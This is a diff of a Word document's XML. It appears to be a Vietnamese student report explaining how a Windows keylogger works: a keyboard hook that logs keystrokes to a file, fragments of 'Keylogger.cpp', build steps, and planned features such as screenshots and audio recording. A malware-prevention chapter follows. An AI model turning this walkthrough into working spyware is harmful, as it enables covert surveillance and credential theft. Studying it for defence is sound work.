-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Kích thước, tính bằng ký tự, của vùng đệm được trỏ tới bởi tham số</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>(LPWSTR)&amp;buffer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- Giá trị cờ cuối cùng: cờ điều khiển hàm. Đặt giá trị là 0 sẽ </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ghi nhận phím đó vào buffer.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Cuối cùng là hàm để ghi giá trị vào file log</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
         <w:t>Trong khối lệnh if thứ 2, ta demo những macro</w:t>
       </w:r>
       <w:r>
@@ -13633,30 +17024,60 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Cuối cùng ta cần gọi hàm CallNextHookEx() để gọi hook tiếp theo trong hook chain.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:t xml:space="preserve">Cuối cùng ta cần gọi hàm </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>CallNextHookEx(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>) để gọi hook tiếp theo trong hook chain.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:bookmarkStart w:id="26" w:name="_Toc57761773"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -13665,6 +17086,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -13673,11 +17097,15 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>. File Keylogger.cpp</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="26"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13788,6 +17216,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> WINAPI </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -13808,6 +17237,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -13940,6 +17370,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -13960,6 +17391,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -14128,7 +17560,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">    MSG msg</w:t>
+        <w:t xml:space="preserve">    MSG </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>msg</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14139,6 +17581,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14183,6 +17626,7 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -14203,6 +17647,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -14364,6 +17809,7 @@
         </w:rPr>
         <w:t>msg</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -14373,6 +17819,7 @@
         </w:rPr>
         <w:t>);</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14424,6 +17871,7 @@
         </w:rPr>
         <w:t>msg</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -14433,6 +17881,7 @@
         </w:rPr>
         <w:t>);</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14515,6 +17964,7 @@
         </w:rPr>
         <w:t>hKeyHook</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -14524,6 +17974,7 @@
         </w:rPr>
         <w:t>);</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14566,6 +18017,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -14584,6 +18036,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14767,7 +18220,43 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Trước tiên, ta khởi tạo một hàm WinMain(). Hàm WinMain() có những tham số sau:</w:t>
+        <w:t xml:space="preserve">Trước tiên, ta khởi tạo một hàm </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>WinMain(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">). Hàm </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>WinMain(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>) có những tham số sau:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14971,7 +18460,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>1 số nguyên để cung cấp cho hàm ShowWindow()</w:t>
+        <w:t xml:space="preserve">1 số nguyên để cung cấp cho hàm </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ShowWindow(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14998,7 +18505,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Trong hàm WinMain(), ta khởi tạo một hook </w:t>
+        <w:t xml:space="preserve">Trong hàm </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>WinMain(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">), ta khởi tạo một hook </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15207,7 +18732,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Trong trường hợp này, dwThreadId trả về giá trị là 0, tham số này được đặt là GetModuleHandle(NULL) trả về một handle cho tệp được sử dụng để tạo quá trình gọi.</w:t>
+        <w:t xml:space="preserve"> Trong trường hợp này, dwThreadId trả về giá trị là 0, tham số này được đặt là </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>GetModuleHandle(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>NULL) trả về một handle cho tệp được sử dụng để tạo quá trình gọi.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15373,6 +18916,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -15380,7 +18924,16 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>GetMessage() là hàm lấy thông tin từ message queue, khi tương tác với hệ thống, các tương tác được máy hiểu là các message và lưu vào một queue trong hệ thống, vòng lặp sẽ bắt các message này từ hệ thống.</w:t>
+        <w:t>GetMessage(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>) là hàm lấy thông tin từ message queue, khi tương tác với hệ thống, các tương tác được máy hiểu là các message và lưu vào một queue trong hệ thống, vòng lặp sẽ bắt các message này từ hệ thống.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15393,13 +18946,23 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">TranslateMessage() – Hàm này sẽ dịch message, hiểu đơn giản nếu </w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>TranslateMessage(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) – Hàm này sẽ dịch message, hiểu đơn giản nếu </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15527,6 +19090,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Sau khi kết thúc, ta sử dụng hàm </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -15541,7 +19105,16 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">() để </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) để </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15562,22 +19135,32 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="27" w:name="_Toc57761774"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>2.4. Build chương trình</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="27"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15687,13 +19270,49 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Hình 2.2: Giá trị cờ trong Compiler Settings</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="28" w:name="_Toc57761775"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -15702,6 +19321,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -15710,11 +19332,15 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>. Những hướng phát triển của Project</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="28"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15778,7 +19404,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Hoàn thành nốt những phím đặc biệt như: F1..F12, Insert, PageUp, PageDown, NumLock, CapsLock,...</w:t>
+        <w:t>Hoàn thành nốt những phím đặc biệt như: F</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>1..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>F12, Insert, PageUp, PageDown, NumLock, CapsLock,...</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15879,8 +19523,18 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>- Ngoài việc ghi nhận phím người dùng nhập vào, nó có thể chụp màn hình, ghi âm những gì người dùng nói,..</w:t>
-      </w:r>
+        <w:t xml:space="preserve">- Ngoài việc ghi nhận phím người dùng nhập vào, nó có thể chụp màn hình, ghi âm những gì người dùng </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>nói,..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15901,23 +19555,33 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="29" w:name="_Toc57761776"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:t>*/ Tiểu kết chương 2:</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="29"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16012,6 +19676,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="30" w:name="_Toc57761777"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -16035,6 +19700,7 @@
         </w:rPr>
         <w:t>PHƯƠNG PHÁP PHÒNG CHỐNG MÃ ĐỘC</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="30"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16048,30 +19714,32 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="120" w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="31" w:name="_Toc57761778"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>3.1. Các phương pháp phòng tránh mã độc hiệu quả</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="31"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16401,8 +20069,18 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
